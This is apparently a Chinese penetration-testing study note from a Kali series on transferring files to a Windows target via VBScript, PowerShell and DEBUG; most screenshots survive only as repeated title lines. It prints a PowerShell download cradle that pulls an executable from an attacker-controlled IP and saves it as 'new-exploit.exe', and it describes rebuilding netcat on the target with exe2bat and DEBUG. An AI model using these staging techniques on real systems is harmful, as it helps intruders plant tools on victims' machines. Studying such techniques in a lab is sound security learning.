Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

时间:2023-03-10 07:11:01
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

其实VBScript只是一个工具

本质是开启http服务提供下载的

首先我们开启http服务:阿帕奇

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

然后给上传一个文件做演示:

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

接下来就是编写VBScript:

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

这些内容全部输入完成之后:

传输

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

早期版本的windows使用vb作为脚本

而win7以后主要的脚本语言就是powershell

$storageDir = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://192.168.232.130/whoami.exe"
$file = "new-exploit.exe"
$webclient.DownloadFile($url,$file)

运行:这里的参数比较多(注意后缀是ps1数字1,而不是L)

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

使用DEBUG命令实现文件传输:

Debug工具是windows做汇编等功能的

文件最大为64k

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

这段红字有错误:exe2bat不是转换成十六进制,是将一个可执行文件转换成批处理文件

打开这个文本,然后将这些全都复制到命令行里面

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件
Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

将123.hex作为输入,开始汇编。

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

经过测试,nc可以使用了

Kali学习笔记35:使用VBScript、PowerShell、DEBUG传输文件

需要注意的是,这个文件不能大于64K。因此前面才会尽量压缩